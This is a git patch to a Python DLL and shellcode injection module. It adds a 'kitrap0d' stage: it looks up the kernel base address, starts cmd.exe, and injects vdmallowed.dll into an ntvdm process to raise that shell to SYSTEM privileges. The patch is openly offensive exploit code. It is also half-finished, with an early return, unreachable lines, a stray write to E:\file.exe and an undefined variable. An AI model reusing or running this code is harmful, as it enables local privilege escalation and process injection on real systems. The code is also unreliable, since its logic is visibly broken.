From ca12de0bae1f2047be2d0e34a1627e69eec0b3a7 Mon Sep 17 00:00:00 2001 From: PsychoMario Date: Wed, 30 May 2012 23:31:44 +0100 Subject: [PATCH] Adding in kitrap0d exe stage --- dllinject.py | 178 ++++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 177 insertions(+), 1 deletion(-) diff --git a/dllinject.py b/dllinject.py index 472d895..fb06e54 100644 --- a/dllinject.py +++ b/dllinject.py @@ -2,6 +2,7 @@ import ctypes.wintypes as wintypes import platform import binascii +import os wintypes.LPTSTR = ctypes.POINTER(ctypes.c_char) wintypes.LPBYTE = ctypes.POINTER(ctypes.c_ubyte) @@ -60,6 +61,90 @@ class __PROCESS_INFORMATION(ctypes.Structure): ("dwProcessId", wintypes.DWORD), ("dwThreadId", wintypes.DWORD),] wintypes.PROCESS_INFORMATION = __PROCESS_INFORMATION +class __SYSTEM_MODULE_INFORMATION(ctypes.Structure): + _fields_ = [("ModuleCount", wintypes.ULONG), + ("WhoCares", ctypes.c_void_p * 2), + ("BaseAddress", ctypes.c_void_p), + ("Size", wintypes.ULONG), + ("MoarStuff", wintypes.ULONG), + ("MoarMoar", wintypes.USHORT), + ("HeyThere", wintypes.USHORT), + ("Pwned", wintypes.USHORT), + ("W00t", wintypes.USHORT), + ("ImageName", ctypes.c_char * 256),] +wintypes.SYSTEM_MODULE_INFORMATION = __SYSTEM_MODULE_INFORMATION +class __IMAGE_DOS_HEADER(ctypes.Structure): + _fields_ = [("e_magic", wintypes.WORD), + ("e_cblp", wintypes.WORD), + ("e_cp", wintypes.WORD), + ("e_crlc", wintypes.WORD), + ("e_cparhdr", wintypes.WORD), + ("e_minalloc", wintypes.WORD), + ("e_maxalloc", wintypes.WORD), + ("e_ss", wintypes.WORD), + ("e_sp", wintypes.WORD), + ("e_csum", wintypes.WORD), + ("e_ip", wintypes.WORD), + ("e_cs", wintypes.WORD), + ("e_lfarlc", wintypes.WORD), + ("e_ovno", wintypes.WORD), + ("e_res", wintypes.WORD * 4), + ("e_oemid", wintypes.WORD), + ("e_oeminfo", wintypes.WORD), + ("e_res2", wintypes.WORD * 10), + ("e_lfanew", wintypes.LONG),] +wintypes.IMAGE_DOS_HEADER = __IMAGE_DOS_HEADER +class __IMAGE_FILE_HEADER(ctypes.Structure): + _fields_ = [("Machine", wintypes.WORD), + ("NumberOfSections", wintypes.WORD), + ("TimeDateStamp", wintypes.DWORD), + ("PointerToSymbolTable", wintypes.DWORD), + ("NumberOfSymbols", wintypes.DWORD), + ("SizeOfOptionalHeader", wintypes.WORD), + ("Characteristics", wintypes.WORD),] +wintypes.IMAGE_FILE_HEADER = __IMAGE_FILE_HEADER +class __IMAGE_DATA_DIRECTORY(ctypes.Structure): + _fields_ = [("VirtualAddress", wintypes.DWORD), + ("Size", wintypes.DWORD),] +wintypes.IMAGE_DATA_DIRECTORY = __IMAGE_DATA_DIRECTORY +class __IMAGE_OPTIONAL_HEADER(ctypes.Structure): + _fields_ = [("Magic", wintypes.WORD), + ("MajorLinkerVersion", wintypes.BYTE), + ("MinorLinkerVersion", wintypes.BYTE), + ("SizeOfCode", wintypes.DWORD), + ("SizeOfInitializedData", wintypes.DWORD), + ("SizeOfUninitializedData", wintypes.DWORD), + ("AddressOfEntryPoint", wintypes.DWORD), + ("BaseOfCode", wintypes.DWORD), + ("BaseOfData", wintypes.DWORD), + ("ImageBase", wintypes.DWORD), + ("SectionAlignment", wintypes.DWORD), + ("FileAlignment", wintypes.DWORD), + ("MajorOperatingSystemVersion", wintypes.WORD), + ("MinorOperatingSystemVersion", wintypes.WORD), + ("MajorImageVersion", wintypes.WORD), + ("MinorImageVersion", wintypes.WORD), + ("MajorSubsystemVersion", wintypes.WORD), + ("MinorSubsystemVersion", wintypes.WORD), + ("Win32VersionValue", wintypes.DWORD), + ("SizeOfImage", wintypes.DWORD), + ("SizeOfHeaders", wintypes.DWORD), + ("CheckSum", wintypes.DWORD), + ("Subsystem", wintypes.WORD), + ("DllCharacteristics", wintypes.WORD), + ("SizeOfStackReserve", wintypes.DWORD), + ("SizeOfStackCommit", wintypes.DWORD), + ("SizeOfHeapReserve", wintypes.DWORD), + ("SizeOfHeapCommit", wintypes.DWORD), + ("LoaderFlags", wintypes.DWORD), + ("NumberOfRvaAndSizes", wintypes.DWORD), + ("DataDirectory", wintypes.IMAGE_DATA_DIRECTORY * 16),] +wintypes.IMAGE_OPTIONAL_HEADER = __IMAGE_OPTIONAL_HEADER +class __IMAGE_NT_HEADER(ctypes.Structure): + _fields_ = [("Signature", wintypes.DWORD), + ("FileHeader", wintypes.IMAGE_FILE_HEADER), + ("OptionalHeader", wintypes.IMAGE_OPTIONAL_HEADER),] +wintypes.IMAGE_NT_HEADER = __IMAGE_NT_HEADER class Process(): """This class can be used for dll or shellcode injection. @@ -79,7 +164,7 @@ class Process(): self.terminate(code) This will terminate the process in use regardless of where it was started from. code is the exit code""" - def __init__(self, pid=None, pe=None): + def __init__(self, pid=None, pe=None, handle=None): self.kernel32 = ctypes.windll.kernel32 self.PROCESS_ALL_ACCESS = (0x000F0000L|0x00100000L|0xFFF) self.SE_DEBUG_NAME = "SeDebugPrivilege" @@ -112,6 +197,8 @@ def __init__(self, pid=None, pe=None): ctypes.byref(process_information) ) self.handle = process_information.hProcess + elif handle: + self.handle = handle else: return None @@ -164,6 +251,7 @@ def inject(self, dllpath): #inject dllpath into our process and then executes it """ + dllpath = os.path.abspath(dllpath) push = "\x68" dllpath = "\x00".join(list(dllpath))+"\x00\x00\x00" #convert to null padded unicode @@ -263,3 +351,91 @@ def terminate(self, code=0): code ) self.kernel32.CloseHandle(self.handle) + + +def get_kernel_addr(): + ntdll = ctypes.windll.ntdll + buffer_size = wintypes.ULONG(0) + ntdll.ZwQuerySystemInformation(11, 0, 0, ctypes.byref(buffer_size)); + + sysmod_info = ctypes.create_string_buffer(buffer_size.value) + ntdll.ZwQuerySystemInformation(11, ctypes.byref(sysmod_info), buffer_size.value, ctypes.byref(buffer_size)); + + mod_list = ctypes.cast(sysmod_info, ctypes.POINTER(wintypes.SYSTEM_MODULE_INFORMATION)) + return (mod_list[0].BaseAddress, mod_list[0].ImageName.split('\\')[-1], mod_list[0].Size) + +def kitrap0d(): + kernel32 = ctypes.windll.kernel32 + + startupinfo = wintypes.STARTUPINFO() + process_information = wintypes.PROCESS_INFORMATION() + startupinfo.dwFlags = 0x1 + startupinfo.wShowWindow = 0x1 + startupinfo.cb = ctypes.sizeof(startupinfo) + kernel32.CreateProcessA( + "C:\\WINDOWS\\system32\\cmd.exe", + "C:\\WINDOWS\\system32\\cmd.exe", + None, + None, + False, + 0x00000010, + None, + None, + ctypes.byref(startupinfo), + ctypes.byref(process_information) + ) + givesys = process_information.dwProcessId + + kernbase, kernimage, kernsize = get_kernel_addr() + kernhandle = kernel32.LoadLibraryA(kernimage) + xpsig = "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84" + dos_header = ctypes.cast(kernhandle, ctypes.POINTER(wintypes.IMAGE_DOS_HEADER)) + nt_header = ctypes.cast(kernhandle + dos_header.contents.e_lfanew, ctypes.POINTER(wintypes.IMAGE_NT_HEADER)) + optional_header = nt_header.contents.OptionalHeader + baseofcode = optional_header.BaseOfCode + sizeofcode = optional_header.SizeOfCode + #search between kernelhandle[baseofcode] - kernelhandle[baseofcode+sizeofcode] for xpsig + buf = ctypes.c_byte*kernsize + kernelarray = ctypes.cast(kernhandle, ctypes.POINTER(buf)).contents + fh=open("E:\\file.exe",'wb') + kernelarray = kernelarray[:] + kernelarray = [chr(abs(i)) for i in kernelarray] + return kernelarray + fh.close() + #for i in range(0,kernsize): + # chunk = ''.join([chr(abs(i)) for i in kernelarray[i:i+len(xpsig)]]) + # if chunk == xpsig: + # continue + return i + + + + kernel32.SetEnvironmentVariable("VDM_TARGET_PID",hex(givesys)) + kernel32.SetEnvironmentVariable("VDM_TARGET_KRN",hex(kernbase)) + kernel32.SetEnvironmentVariable("VDM_TARGET_OFF",hex(kernoff)) + + startupinfo = wintypes.STARTUPINFO() + process_information = wintypes.PROCESS_INFORMATION() + startupinfo.dwFlags = 0x1 + startupinfo.wShowWindow = 0x0 + startupinfo.cb = ctypes.sizeof(startupinfo) + kernel32.CreateProcessA( + "C:\\WINDOWS\\system32\\debug.exe", + None, + None, + None, + True, + 0x00000004, + None, + None, + ctypes.byref(startupinfo), + ctypes.byref(process_information) + ) + ntvdm = kernel32.OpenProcess( + 0x43b, + False, + process_information.dwProcessId + ) + + ntvdminject = Process(handle=ntvdm) + ntvdminject.inject("vdmallowed.dll")